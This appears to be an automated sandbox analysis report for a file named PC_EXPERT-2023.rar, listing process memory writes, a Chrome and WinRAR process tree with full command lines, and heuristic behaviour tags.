chrome.exedescription pid process target process PID 4248 wrote to memory of 4036 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4036 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4320 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4300 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 4300 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe PID 4248 wrote to memory of 3592 4248 chrome.exe chrome.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\PC_EXPERT-2023.rar1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1768 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3764 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4304 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4464 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4604 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4364 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4568 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4884 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4468 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4788 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4912 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5052 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3140 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5588 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5544 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5704 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5272 /prefetch:82⤵
-
C:\Users\Admin\Downloads\winrar-x64-620.exe"C:\Users\Admin\Downloads\winrar-x64-620.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinRAR\uninstall.exe"C:\Program Files\WinRAR\uninstall.exe" /setup3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4916 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,314570888479451308,6480922471486020796,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4832 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2628 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1988 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4804 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4756 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2796 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5572 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5728 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1452 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2452 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1500,15100556788089129857,3616410522255131697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3680 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
